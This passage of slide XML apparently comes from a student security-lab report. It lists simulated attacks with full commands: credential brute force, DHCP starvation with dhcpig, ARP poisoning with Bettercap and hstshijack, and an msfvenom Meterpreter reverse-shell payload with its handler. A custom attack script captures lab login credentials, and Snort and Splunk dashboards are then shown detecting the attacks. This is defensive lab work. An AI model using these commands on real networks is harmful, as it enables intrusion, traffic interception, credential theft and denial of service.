            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>v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 spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>L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$user_file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>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P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$pass_file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$protocol://$target_ip:$port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 spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>credentials.txt</a:t>
            </a:r>
            <a:endParaRPr sz="11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315"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="11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100" spc="55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP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Starvation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Attack:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="697865" marR="43815" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>In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55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP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starvation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attack,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attacker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floods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55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP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server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55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP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requests, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>exhausting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available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IP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address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pool.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This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can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lead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denial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service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for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>legitimate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clients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trying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obtain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IP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addresses.</a:t>
            </a:r>
            <a:endParaRPr sz="11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65"/>
              </a:spcBef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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCPig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following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</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1155065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1155065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sudo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dhcpig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>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>c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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>v10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 spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>l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-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 spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>i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>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>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$iinterface</a:t>
            </a:r>
            <a:endParaRPr sz="11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380"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="11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100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>MITM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ARP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Poisoning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Attack:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="697865" marR="83820" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="109700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef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Man-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>in-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Middle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(MITM)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ARP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poisoning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involves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spoofing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ARP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messages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associate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attacker's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50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>MAC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address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IP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address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another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device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on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network.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This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allows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attacker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intercept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manipulate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network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traffic </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>between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victim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other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devices.</a:t>
            </a:r>
            <a:endParaRPr sz="11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697865" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Bettercap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for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following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command:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1155065" marR="17780" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="109100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1155065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sudo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bettercap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-iface</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> $iface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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>eval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"set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arp.spoof.fullduplex</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> true;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set </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>arp.spoof.target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$target_ip;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> net.sniff </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on;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arp.spoof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on;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hstshijack/hstshijack"</a:t>
            </a:r>
            <a:endParaRPr sz="11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380"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="11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100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Meterpreter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Reverse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Shell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Windows:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="697865" marR="198120" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="109800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
              </a:tabLst>
            </a:pP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involves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establishing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reverse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shell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Windows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system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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Meterpreter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payload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generated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msfvenom.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Once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executed,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reverse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shell </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>provides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attacker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remote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access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control</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> over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compromised </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Windows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machine.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simple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python3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webserver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also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to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>transfer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malware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target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machine</a:t>
            </a:r>
            <a:endParaRPr sz="11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120"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Metasploit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Python3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following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commands:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1155065" marR="808355" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1155065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="2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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> LHOST=$lhost </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LPORT=$lport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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-90">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>f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exe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&gt;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payloads/$file_name.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1155065" indent="-22860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1155065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>python3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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>m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http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>directory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payloads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8080</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1155065" marR="370840" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1155065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>q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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>x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"use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exploit/multi/handler;set </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>windows/meterpreter/reverse_tcp;set</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>$lhost;set</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="2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LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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$lport; exploit"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756326"/>
            <a:ext cx="5598160" cy="190182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2000" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Metro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Boomin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-19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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Make</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-19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it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-19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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Boom</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="12065">
              <a:lnSpc>
                <a:spcPct val="109100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="580"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Out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5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attacks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will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show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one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them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action,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being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4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MITM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Arp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Poisoning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via </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Bettercap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600" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Better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no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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cap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100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500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first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start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splunkforwarder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snort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our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Ubuntu2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machine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previous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bash script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wrote.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can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also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watch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alerts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real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time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command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70" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tail </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>f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 b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/var/log/snort/alert.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274030"/>
            <a:ext cx="5620385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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Next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ran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metro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attacker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machine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command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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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./metro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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>i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eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="15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then </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>choose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option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4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input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target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IP,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case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it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will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Windows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10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machine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at </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>192.168.1.110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8926779"/>
            <a:ext cx="56915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latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Immediately,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alerts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Attempted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Arp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cache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60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>attack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fill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terminal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Ubuntu2.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772155"/>
            <a:ext cx="5225161" cy="24237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964935"/>
            <a:ext cx="4810760" cy="2866771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025267"/>
            <a:ext cx="58820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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Next,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visit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totally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secure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login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page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Windows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10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machine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put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our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credentials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802248"/>
            <a:ext cx="48101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end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up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sniffing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POST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request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successfully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capturing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credentials.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7720431"/>
            <a:ext cx="5839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10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>We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ended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up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being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successful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attacker,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but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more</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> importantly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successful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at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monitoring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 spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>traffic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network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notifying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about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attack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taking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place.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4880"/>
            <a:ext cx="4093210" cy="19861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331971"/>
            <a:ext cx="3276980" cy="23755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108191"/>
            <a:ext cx="5943600" cy="153161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145415"/>
            <a:ext cx="5638165" cy="153924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000" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Final</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-229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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Results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Snort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Dashboard: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0100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
            </a:pP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Snort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dashboard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provides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insights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into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network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intrusion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attempts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suspicious </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>activities.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It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displays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total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number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of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events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detected,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their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types,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devices involved.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4880"/>
            <a:ext cx="5943600" cy="31535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99073"/>
            <a:ext cx="5326507" cy="27844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16057"/>
            <a:ext cx="5920105" cy="103505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600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SOC</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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Dashboard: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600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pP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Windows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85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SOC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dashboard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offers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visibility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into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authentication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events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on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Windows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hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>within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50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> network.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It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highlights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successful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unsuccessful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local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NTLM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logins,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domain account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activities,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other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relevant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information.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7498290"/>
            <a:ext cx="5894705" cy="123634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600" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Syslog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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-12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Querying: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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Syslog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messages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from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Ubuntu2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vRouter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are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centrally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collected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can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be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queried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on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Splunk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server.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By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filtering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with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 spc="-20" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>"sourcetype=cisco.ios"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-60" b="1" i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"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-10" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sourcetype=syslog"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>administrators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can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easily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retrieve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analyze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syslog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data,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gaining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insights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into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network </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>device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activities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system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events.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65122"/>
            <a:ext cx="5039995" cy="25888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0476"/>
            <a:ext cx="5664200" cy="2939923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44651"/>
            <a:ext cx="5963920" cy="20053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latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Simulated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55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1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>List:.............................................................................................................23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 spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Metro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Boomin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Make</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
